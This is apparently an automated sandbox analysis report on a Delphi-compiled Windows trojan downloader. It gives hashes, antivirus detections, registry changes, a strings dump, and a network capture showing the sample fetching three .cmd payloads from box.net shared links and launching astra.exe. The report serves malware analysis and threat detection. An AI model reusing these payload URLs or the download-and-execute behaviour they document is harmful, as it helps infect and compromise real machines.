Analysis Date: 2014-03-14 19:33:44
MD5: 02948d1b6de2180e3d48af091a3bdd44
SHA1: ac7f044eec7e622efc6026cf3682b1d2aeaf90d5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE   md5: 2f597e4ca90576ce8ce02c1fd0c625e4 sha1: 0075eb5c875133e3d97727679fbaf9a3576d5c2f size: 90112
Section DATA   md5: 7c09998aa393d3d109491ba9bb0e68b3 sha1: d70bfeacd84eee4ca34a4a60b64567c7e18e7aa9 size: 2048
Section BSS    md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (hashes of empty input)
Section .idata md5: c79f46938718bd8b9fb429ee0bf268cc sha1: 43492c35c4b08d574221ef078434970dc874294c size: 3072
Section .tls   md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (hashes of empty input)
Section .rdata md5: 076b242ee0e0b1a4ea9b8ff567befb6b sha1: d26e41c4f1b30f098cb43879697ecf4eea8005b3 size: 512
Section .reloc md5: 4e613977daa6aedf3e129ec5ca350057 sha1: e9620f61e8335ae0443d563cb3dff8a8d4cfc889 size: 7680
Section .rsrc  md5: 2828ffef6c2968f8096b852b94596b6d sha1: 97f1b5e2243f936b2927ea6c4f047d2aff8734db size: 31232
Timestamp: 1992-06-19 22:22:17 (this is the fixed TimeDateStamp 0x2A425E19 that Borland Delphi linkers write into every PE they produce; it identifies the compiler, not the build date, and it agrees with the Borland\Delphi registry paths and Delphi RTL class names in the Strings section below)
PEhash: 29656ce00780e21b0ea201b8bbd12babb50d34dd
IMPhash: 36c22b46092e3f4497aa2b5d3de68220
AV avira: DIAL/Generic
AV msse: TrojanDownloader:Win32/Small.gen!AO
AV avg: Downloader.Rozena

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\astra.exe
Winsock DNS: www.box.net
Winsock URL: http://www.box.net/shared/static/xhf7wad6sg.cmd
Winsock URL: http://www.box.net/shared/static/u195q51kwc.cmd
Winsock URL: http://www.box.net/shared/static/5bhvnbogks.cmd

Process
↳ C:\WINDOWS\astra.exe

Network Details:

DNS: www.box.net (A) ➝ 74.112.185.83
DNS: www.box.net (A) ➝ 74.112.184.83
HTTP GET: http://www.box.net/shared/static/u195q51kwc.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.box.net/shared/static/5bhvnbogks.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.box.net/shared/static/xhf7wad6sg.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 74.112.185.83:80
Flows TCP: 192.168.1.1:1033 ➝ 74.112.185.83:80
Flows TCP: 192.168.1.1:1034 ➝ 74.112.185.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f75 31393571 35316b77 632e636d   ic/u195q51kwc.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f35 6268766e 626f676b 732e636d   ic/5bhvnbogks.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f78 68663777 61643673 672e636d   ic/xhf7wad6sg.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
\
-
.
../.
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Control-C hit
December
Division by zero
DVCLAL
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)
MAINICON(
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
!'%s' is not a valid integer value
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unable to create directory
Unexpected variant error
)Variant or safe array index out of bounds
Variant or safe array is locked
Variant overflow
Write$Error creating variant or safe array
(((((((((___>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0$0(0,0004080<0@0D0T0t0|0
0*000J0R0Z0f0n0v0~0
0/0@0P0f0r0
"0+010:0B0K0U0Z0e0n0}0
0031F034E81173E92D963D2FD77EC6A35BF52F6FA850E261F062DF1ED16B87BC160FC5B9B3BD78FA618F4B9E8DBF6089
<0@0D0(10141X1\1
0<0H0L0P0T0X0\0`0d0p0}0
0:0S0k0
	0;0w0
0123456789ABCDEF
0:1A1S1q1z1
0!2;2E2
> >$>(>,>0>4>8><>@>D>H>L>P>T>h>
:$:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:|:
:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;H;h;p;t;x;|;
? ?$?(?,?0?4?H?h?p?t?x?|?
<$<(<0<4<<<@<H<L<T<X<`<d<l<p<x<|<
= =$=,=0=8=<=D=H=P=T=\=`=h=l=t=x=
>'>0>;>D>K>Z>a>
;+<0<J<o<
; ;$;(;,;0;L;l;t;x;|;
"0?_Z______ZZZKI??__Z__________ZY___Z____________YYZ__
10181<1@1D1H1L1P1T1X1r1z1
1#1'1+1/13171;1?1C1G1K1O1_1
1'1-141:1?1E1L1V1]1b1h1p1x1
1*1;1D1
1,14181<1@1D1H1L1P1T1d1
1-181=1B1O1e1l1~1
1?1U1m1r1
121\1e1u1}1
1(252^2
1E3827D2669DD856E973F51639A710D70D49FE558DFA339F33
1F1b1f1j1n1r1v1z1~1
2034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
2"2*222:2B2J2R2Z2b2j2r2z2
2)2.23282=2C2H2M2S2Z2`2g2m2t2z2
2(2@2L2T2k2z2
2(262j2
2)282O2^2u2
2;2G2N2X2c2u2
2 3)3[3d3
2,3P3n3~3
282@2D2H2L2P2T2X2\2`2p2
2B2W2l2
2d3h3l3p3t3x3|3
2h3l3p3t3x3|3
2M2h2q2
2P2X2`2h2p2x2
;;;;;;;;;;;;3
314?4N4e4
3(3034383<3@3D3H3L3P3`3
3 3$3(3,303H3h3p3t3x3|3
3#3'3+3/33373;3?3C3G3K3O3S3W3[3_3c3g3k3o3s3
3 3@3H3L3P3T3X3\3`3d3h3x3
3'3B3U3^3}3
34DD0525CA1CA346F064B7BF63F06683BF1075FD15C666FB5CF4
3'5[6B7x7
363l3y3
>#>'>+>/>3>7>
;;3CKN\PWW
3Messages
4$4(4,4044484<4@4D4T4t4|4
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4!4%4)4-4145494=4
4,4L4T4X4\4`4d4h4l4p4t4
4$4u4|4
46D05EEB0F6A8B849FC42BC34C87CE679A3225BB7EA2
4A4P4^4
<4<<<@<D<H<L<P<T<X<\<x<
>4><>@>D>H>L>P>T>X>\>x>
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>S>_>l>~>
:&:,:4:F:R:a:m:u:
"4Lhmws__
4m5q5u5y5}5
;);5;~=
;%;-;5;=;
5$5,5054585<5@5D5H5L5\5|5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 5$5(5,5D5d5l5p5t5x5|5
5%5/5C5R5
5$5C5K5Y5
5(5K5z5+6G6
5 6'666=6[6
576b6r6}6
5A6^6{6
>*>5>?>J>T>_>i>s>y>
5O5n5v5~5
5?____ZY_[9
6$636=6O6g6s6
6#6(63696>6I6O6T6_6e6j6u6{6
6 6$6(6,6064686<6@6P6p6x6|6
6 6@6H6L6P6T6X6\6`6d6h6x6
6#6+6O6o6
6-797T7
6.7C7P7p7u8
6'7H7o7
#6A?__\_CC
6AF47A8784C40531D67FDD1573EE64D30D4AFC558DAF4E9B39A2A5598EAB46F86896F772AB49E2053ADC036FE45CDC
6D6L6W6
:&:.:6:>:F:N:V:^:f:n:v:~:
:%:+:6:>:G:S:Y:a:j:v:{:
>!>6>;>H>h>
747N7]7
7&707:7Q7b7o7v7z7
7,74787<7@7D7H7L7P7T7h7
7%7+707;7A7F7Q7W7\7g7m7r7}7
7+7=7U7
7>7B7H7L7Q7X7^7f7q7
7)7L7X7\7l7t7x7|7
7_8f8~8
7Project1
7?_____ZZSSH%
8,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
859N9e9
8(828W8a8k8s8y8
 (88(3Nq
8"848B8F8X8q8|8
8$8.868>8F8N8v8
8<8D8H8L8P8T8X8\8`8d8|8
8&9.:2:6:::>:B:F:J:N:R:V:Z:^:b:f:j:n:r:v:z:~:
8&9*9.9F9T9X9t9|9
?$?.?8?B?L?V?h?
/'+8FX]s}
%8@HHHI_~
%8LX]]]XUav
/)+8Ql
9680EF1D38B3313EC12B4DED72DD6591B414075D9F44
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9l9}9
9"9,9C9O9\9n9{9
:9:=:A:E:I:M:Q:U:Y:]:a:e:i:m:q:u:y:}:
9H9W9f9
9p9t9x9|9
A94BEA0E325EBEA652FB402ACA034B2ED50EC7C77198AA29B82A17C77FB87592C3B87097BCA649FD2F26D50D7A924DFC
advapi32.dll
;A<M<\<
Apartment
Array 
B9A58AB743BE3EC9559EC25BFA57FB39D337D96382
;	;B;b;
Boolean
BT]?___='
ByRef 
>.>C>}>
**?___\_C8	 2
CF6180A55AA6E65D9822AA9CB811B9B0568E4644FD27DB7AE979E617C872BE64F16BE10B32FD3BCA779D4588F714CC7C
CharNextA
CharToOemA
Classes
^Classes
CloseHandle
CoAddRefServerProcess
CoCreateInstanceEx
CoInitialize
CoInitializeEx
CompareStringA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
CreateDirectoryA
CreateEventA
CreateFileA
Currency
CVariants
?____D
DDDA3s
DDDDDD
DDDDDDL
DDDDDL
DDDDLDD
Decimal
DeleteCriticalSection
<D=I=h=y=5><>
Dispatch
Double
;$;);`;e;~;
E1f3o3v4
EAbstractError
EAccessViolation
EAssertionFailed
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EFOpenErrorH4A
EHeapException
EInOutErrorH`@
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidOp
EInvalidPointerxd@
EListError
EMathError
EnterCriticalSection
EnumCalendarInfoA
	EOleError
EOleException
EOleSysError
_E)O____________M3__O?(((((_____G@__(&:FNQF((___J@_(.4-/<LVX?(__P
EOSError
EOutOfMemory
	EOverflow
EPrivilege
ERangeError
EReadError
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError`
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteErrorP5A
	Exception8_@
ExitProcess
EZeroDividelc@
FComObj
FileTimeToDosDateTime
FileTimeToLocalFileTime
FindClose
FindFirstFileA
FindWindowA
FormatMessageA
FPUMaskValue
FreeLibrary
='=F=X=
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDateFormatA
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetErrorInfo
GetFileAttributesA
GetFullPathNameA
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetSystemMetrics
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
;&;.;;;G;T;f;l;t;|;
= =$=(=H=h=p=t=x=|=
hhVJB90$""2n
: :@:H:L:P:T:X:\:`:d:h:
>+>I>c>
.idata
\IHXg}
II&&.\
(II1*-
%II11,O
#II1*3
IIII|5IIIIIIIIIII   
IIIII7II>3Fg~
IIIIIB(II<.Fg
IIIII|GIIIIIIIIIIIIII     +H/
IIIIII
IIIIIIaVl
IIIIIIe[n}
IIIIIII
IIIIIIII
IIIII (III1,@p
IIIIIIIII
IIIIIIIII 
IIIIIIIIII 
IIIIIIIIIII
IIIIIIIIIIII 
IIIIIIIIIIIII
III|IIIIIIIIII  
IIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIBR_~
IIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIII??9?IIII
IIIIIIII=Jg
IIIIIIIWJg
IIIIIIr[
IIIIII|vIIIIIIIIIIIIIIIIIIIII?;)
IIIIII`Vs
IIIIINR]
IIIISx
IInterface
INFNAN
InitializeCriticalSection
Integer
InterlockedDecrement
InterlockedIncrement
IStringsAdapter
>$?=?J?c?r?
|j[TB-
kernel32.dll
KWindows
~KxI[)
LeaveCriticalSection
 %@L]gs}ssicav
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
LongWord
<(<-<L<Q<k<|<
%+@L]s}
lstrcpynA
lstrlenA
M1.@Qg
m/d/yy
MessageBoxA
M?FXg}
mmmm d, yyyy
:mm:ss
mm[TJC-
MultiByteToWideChar
Neutral
<N<z<I=M=Q=U=Y=]=a=e=i=m=q=u=y=}=
?$?<?o?
ole32.dll
oleaut32.dll
OleStr
`PHXg}
PostMessageA
-@PPR`
P.reloc
P.rsrc
qComConst
QQQQQQQQSV
QQQQQQSVW3
QQQQQSVW
QQQQSV
QTypInfo
QueryPerformanceCounter
?q?u?y?}?
R?7@Xg}
RaiseException
.rdata
ReadFile
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
>R?e?q?
ResetEvent
<R=i=|=
"RTLConsts
RtlUnwind
Runtime error     at 00000000
;/;:;[;s;
=.>S>{>
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SdZ]_^[
SetEndOfFile
SetEvent
SetFilePointer
ShortInt
Single
Smallint
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
String
Strings
S$_^[Y]
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
SysUtils
<*t"<0r=<9w9i
tagEXCEPINFO 
TCustomVariantType
	TErrorRec
TExceptRec
TFileStream<;A
THandleStream
This program must be run under Win32
t%HtIHtm
TInterfacedObject
TlsGetValue
TlsSetValue
$TMultiReadExclusiveWriteSynchronizer
TObjecth
TObjectt
TPersistent
	TRegGroup
TRegGroups
TStreamP:A
TStringItem
TStringList
TStringListp9A
TStrings
TThreadList
TThreadLocalCounter
UnhandledExceptionFilter
Unknown
URLDownloadToFileA
UrlMon
URLMON.DLL
user32.dll
UTypes
;UW?__R+
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
$VarUtils
VarXor
VirtualAlloc
VirtualFree
VirtualQuery
;?=V=]=_>l>y>
W:7@Qg}
WaitForSingleObject
WideCharToMultiByte
WideStringh
WinExec
WriteFile
&+@X]s}
YUQL23KL23DF90WI5E1JAS467NMCXXL6JAOAUWWMCL0AOMM4A4VZYW9KHJUI2347EJHJKDF3424SKL K3LAKDJSL9RTIKJ
_^[YY]
YZ]_^[
(Z]_^[
$Z]_^[
|ZIIIIIIIIIIIIIIIIIIIIIIIMUU
ZTUWVSPRTj